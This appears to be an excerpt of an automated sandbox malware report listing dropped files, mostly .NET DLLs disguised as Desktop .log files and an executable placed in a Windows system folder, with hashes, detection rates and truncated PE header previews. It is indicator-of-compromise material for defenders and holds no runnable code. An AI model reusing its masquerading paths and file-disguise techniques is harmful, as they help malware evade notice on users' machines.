                                                                                                                      SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\Desktop\GFbXjJsj.log

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):32768
                                                                                                                      Entropy (8bit):5.645950918301459
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                                                                      MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                                                                      SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                                                                      SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                                                                      SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                      C:\Users\user\Desktop\HZSnKfqJ.log

                                                                                                                      Download File
                                                                                                                      Process:C:\ChainagentComponent\ChainFontruntimeCrt.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):32256
                                                                                                                      Entropy (8bit):5.631194486392901
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                      MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                      SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                      SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                      SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                      C:\Users\user\Desktop\HqZFZAkM.log

                                                                                                                      Download File
                                                                                                                      Process:C:\ChainagentComponent\ChainFontruntimeCrt.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):28160
                                                                                                                      Entropy (8bit):5.570953308352568
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:BBOVNMHHPrq2YQGpX0dx+D4uuMig590gQDhJvoKfqeXOWnKNey/B/HM/g/6Y70FB:LOCPAEdx+vuNgD0gQ/gCYoTyn+
                                                                                                                      MD5:A4F19ADB89F8D88DBDF103878CF31608
                                                                                                                      SHA1:46267F43F0188DFD3248C18F07A46448D909BF9B
                                                                                                                      SHA-256:D0613773A711634434DB30F2E35C6892FF54EBEADF49CD254377CAECB204EAA4
                                                                                                                      SHA-512:23AA30D1CD92C4C69BA23C9D04CEBF4863A9EA20699194F9688B1051CE5A0FAD808BC27EE067A8AA86562F35C352824A53F7FB0A93F4A99470A1C97B31AF8C12
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.e...........!.....f..........^.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...dd... ...f.................. ..`.rsrc................h..............@..@.reloc...............l..............@..B................@.......H........X..4+...........W..(..................................................................................................................................................................._..\.....+....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                      C:\Users\user\Desktop\MyEwMoxX.log

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):24576
                                                                                                                      Entropy (8bit):5.535426842040921
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                                                                                      MD5:5420053AF2D273C456FB46C2CDD68F64
                                                                                                                      SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                                                                                      SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                                                                                      SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...a..e...........!.....X...........w... ........@.. ....................................@..................................v..W.................................................................................... ............... ..H............text...$W... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................w......H........Q..D%...........P........................................................................................................................................................................pw.&..l%\....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                      C:\Users\user\Desktop\PjjNTCHQ.log

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):69632
                                                                                                                      Entropy (8bit):5.932541123129161
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                      MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                      SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                      SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                      SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                                                                      C:\Users\user\Desktop\QZsVJdpt.log

                                                                                                                      Download File
                                                                                                                      Process:C:\ChainagentComponent\ChainFontruntimeCrt.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):32768
                                                                                                                      Entropy (8bit):5.645950918301459
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                                                                      MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                                                                      SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                                                                      SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                                                                      SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                      C:\Users\user\Desktop\ZXODDOCy.log

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):85504
                                                                                                                      Entropy (8bit):5.8769270258874755
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                                                      MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                                                      SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                                                      SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                                                      SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                                                                      C:\Users\user\Desktop\hgJAcPUI.log

                                                                                                                      Download File
                                                                                                                      Process:C:\ChainagentComponent\ChainFontruntimeCrt.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):69632
                                                                                                                      Entropy (8bit):5.932541123129161
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                      MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                      SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                      SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                      SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                                                                      C:\Users\user\Desktop\odxAFePx.log

                                                                                                                      Download File
                                                                                                                      Process:C:\ChainagentComponent\ChainFontruntimeCrt.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):24576
                                                                                                                      Entropy (8bit):5.535426842040921
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                                                                                      MD5:5420053AF2D273C456FB46C2CDD68F64
                                                                                                                      SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                                                                                      SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                                                                                      SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...a..e...........!.....X...........w... ........@.. ....................................@..................................v..W.................................................................................... ............... ..H............text...$W... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................w......H........Q..D%...........P........................................................................................................................................................................pw.&..l%\....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                      C:\Users\user\Desktop\otzSQnXU.log

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):33792
                                                                                                                      Entropy (8bit):5.541771649974822
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                                                      MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                                                      SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                                                      SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                                                      SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 38%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                      C:\Users\user\Desktop\phDaBATS.log

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):32256
                                                                                                                      Entropy (8bit):5.631194486392901
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                      MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                      SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                      SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                      SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                      C:\Users\user\Desktop\sUnrMbPq.log

                                                                                                                      Download File
                                                                                                                      Process:C:\ChainagentComponent\ChainFontruntimeCrt.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):85504
                                                                                                                      Entropy (8bit):5.8769270258874755
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                                                      MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                                                      SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                                                      SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                                                      SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                                                                      C:\Users\user\Desktop\xHFppYee.log

                                                                                                                      Download File
                                                                                                                      Process:C:\ChainagentComponent\ChainFontruntimeCrt.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):33792
                                                                                                                      Entropy (8bit):5.541771649974822
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                                                      MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                                                      SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                                                      SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                                                      SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 38%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                      C:\Users\user\Desktop\xWHHAgmB.log

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):28160
                                                                                                                      Entropy (8bit):5.570953308352568
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:BBOVNMHHPrq2YQGpX0dx+D4uuMig590gQDhJvoKfqeXOWnKNey/B/HM/g/6Y70FB:LOCPAEdx+vuNgD0gQ/gCYoTyn+
                                                                                                                      MD5:A4F19ADB89F8D88DBDF103878CF31608
                                                                                                                      SHA1:46267F43F0188DFD3248C18F07A46448D909BF9B
                                                                                                                      SHA-256:D0613773A711634434DB30F2E35C6892FF54EBEADF49CD254377CAECB204EAA4
                                                                                                                      SHA-512:23AA30D1CD92C4C69BA23C9D04CEBF4863A9EA20699194F9688B1051CE5A0FAD808BC27EE067A8AA86562F35C352824A53F7FB0A93F4A99470A1C97B31AF8C12
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.e...........!.....f..........^.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...dd... ...f.................. ..`.rsrc................h..............@..@.reloc...............l..............@..B................@.......H........X..4+...........W..(..................................................................................................................................................................._..\.....+....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                      C:\Windows\AppReadiness\db08104604e511

                                                                                                                      Download File
                                                                                                                      Process:C:\ChainagentComponent\ChainFontruntimeCrt.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):84
                                                                                                                      Entropy (8bit):5.181024494661447
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:fe7xGO5hrqpKkI35WnRu2D1jT:fbOrqe35I1jT
                                                                                                                      MD5:C34DD602BA3D07AA792A5D2B7F097BA8
                                                                                                                      SHA1:AB2945E33C5139E8339F970C12E36EADAE4875FA
                                                                                                                      SHA-256:205A3B9000B560F5F79014A413B44C23AE7F1E4C16F2762734C57712844CFD8B
                                                                                                                      SHA-512:DDF15C1A96276D70288FB95CA1D779800CAD56924AB4149170106964554E7C9BC9CDBB055BB850C0F837090DB2DD9A61BFB1BA058CE5E699709B2CDDD13ECE02
                                                                                                                      Malicious:false
                                                                                                                      Preview:jIIpJUwB5zoe5KVT7N3AONut3WbImAbWOcNUNBPEuEF5dJVvAuOnPCzWYZvx3oY4XRPc6BG67yPKIzPuApI1

                                                                                                                      C:\Windows\AppReadiness\yeeQesPXxpnDuwPWqTnUoVbi.exe

                                                                                                                      Download File
                                                                                                                      Process:C:\ChainagentComponent\ChainFontruntimeCrt.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):2043904
                                                                                                                      Entropy (8bit):7.572623220967923
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:49152:McFZTdUJWxOOZPHst87uOLOkMRxJgSrSmMsc:MczpGWdZPHu9WuRx9rrJ
                                                                                                                      MD5:64105CB19AC25A6275C7D929937090A0
                                                                                                                      SHA1:4B0AB4A6FA17FEED05E183029F3A240D7860437D
                                                                                                                      SHA-256:CB2F1ACA28FCB0A43B1A256A1728A087EFED3D8144F0657C3DD5F4D5A0A6898C
                                                                                                                      SHA-512:7152D54DEF3FF633787549E7353330B949BB51AF3753B77A52B6FA24465CE635C985CBE28D7FC8ECBE4FE4E7B0B39933F79AD4E56817AAC45F8ABFFC0918E4B6
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 83%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Mg.................(...........F... ...`....@.. ....................................@..................................F..K....`.. ............................................................................ ............... ..H............text....&... ...(.................. ..`.rsrc... ....`.......*..............@....reloc..............................@..B.................F......H.......P...l...............*l...E.......................................0..........(.... ........8........E....8...9...........83...(.... ....8....(.... ....~d...{....9....& ....8....*(.... ....~d...{....:....& ....8........0.......... ........8........E....6.......*...........81......... ....~d...{....:....& ....8....r...ps....z*~....(7... .... .... ....s....~....(;....... ....~d...{....:q...& ....8f.......~....(?...~....(C... ....?.... ....~d...{....:0...& ....8%...~....:i

                                                                                                                      \Device\Null

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\System32\PING.EXE
                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):502
                                                                                                                      Entropy (8bit):4.613865166769504
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:P+I5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:VdUOAokItULVDv
                                                                                                                      MD5:86BFC2C1B4A94049A33BB7DC01A2EF35
                                                                                                                      SHA1:66DEEC4292297FC78E3472EE805CD3328D47AAE5
                                                                                                                      SHA-256:9E931CB2BB00EB7D4CC205817A0CF84B68670C9BF44DF0CD13A68B27A460AE57
                                                                                                                      SHA-512:58EBFEC1F777E0627DF95F144D64856537DC90B3CD0489590C5E354EE19BCA7FD75B3AB2544630C161B0A6806B21AB14CF305E08F774302C9578641360F4C46A
                                                                                                                      Malicious:false
